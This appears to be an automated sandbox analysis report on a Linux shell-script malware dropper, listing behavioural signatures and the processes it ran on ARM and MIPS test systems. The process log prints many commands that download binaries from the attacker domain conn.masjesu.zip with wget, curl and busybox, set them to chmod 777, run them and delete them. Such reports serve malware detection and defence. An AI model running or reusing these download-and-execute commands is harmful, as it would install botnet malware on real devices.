Analysis Overview
SHA256
aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b
Threat Level: Shows suspicious behavior
The file aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-21 01:37
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-21 01:37
Reported
2024-10-21 01:40
Platform
debian9-armhf-20240611-en
Max time kernel
149s
Max time network
29s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh
[/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-21 01:37
Reported
2024-10-21 01:40
Platform
debian9-mipsbe-20240729-en
Max time kernel
95s
Max time network
98s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE | /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE | N/A |
| N/A | /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ | /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ | N/A |
| N/A | /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K | /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K | N/A |
| N/A | /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 | /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 | N/A |
| N/A | /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce | /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce | N/A |
| N/A | /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl | /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl | N/A |
| N/A | /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ | /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ | N/A |
| N/A | /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 | /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 | N/A |
| N/A | /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa | /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa | N/A |
| N/A | /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI | /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI | N/A |
| N/A | /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 | /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 | N/A |
| N/A | /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr | /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr | N/A |
| N/A | /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs | /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs | N/A |
| N/A | /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 | /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 | N/A |
| N/A | /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 | /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 | N/A |
| N/A | /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa | /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa | N/A |
| N/A | /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI | /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI | N/A |
| N/A | /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ | /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ | N/A |
| N/A | /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr | /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr | N/A |
| N/A | /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs | /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs | N/A |
| N/A | /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 | /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 | N/A |
| N/A | /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 | /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 | N/A |
| N/A | /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ | /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ | N/A |
| N/A | /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K | /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K | N/A |
| N/A | /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE | /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE | N/A |
| N/A | /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce | /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce | N/A |
| N/A | /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl | /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl | N/A |
| N/A | /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 | /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ | /usr/bin/curl | N/A |
Processes
/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh
[/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]
/bin/chmod
[chmod 777 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]
/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE
[./cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]
/bin/rm
[rm cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]
/bin/chmod
[chmod 777 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]
/tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ
[./cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]
/bin/rm
[rm cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]
/bin/chmod
[chmod 777 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]
/tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K
[./mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]
/bin/rm
[rm mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]
/bin/chmod
[chmod 777 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]
/tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8
[./4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]
/bin/rm
[rm 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]
/bin/chmod
[chmod 777 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]
/tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce
[./LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]
/bin/rm
[rm LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]
/bin/chmod
[chmod 777 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]
/tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl
[./ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]
/bin/rm
[rm ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]
/bin/chmod
[chmod 777 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]
/tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ
[./fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]
/bin/rm
[rm fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]
/bin/chmod
[chmod 777 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]
/tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2
[./XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]
/bin/rm
[rm XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]
/bin/chmod
[chmod 777 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]
/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa
[./HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]
/bin/rm
[rm HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]
/bin/chmod
[chmod 777 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]
/tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI
[./ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]
/bin/rm
[rm ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]
/bin/chmod
[chmod 777 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]
/tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0
[./dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]
/bin/rm
[rm dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]
/bin/chmod
[chmod 777 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]
/tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr
[./Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]
/bin/rm
[rm Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]
/bin/chmod
[chmod 777 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]
/tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs
[./lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]
/bin/rm
[rm lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]
/bin/chmod
[chmod 777 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]
/tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2
[./VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]
/bin/rm
[rm VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]
/bin/chmod
[chmod 777 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]
/tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2
[./XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]
/bin/rm
[rm XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]
/bin/chmod
[chmod 777 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]
/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa
[./HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]
/bin/rm
[rm HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]
/bin/chmod
[chmod 777 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]
/tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI
[./ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]
/bin/rm
[rm ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]
/usr/bin/curl
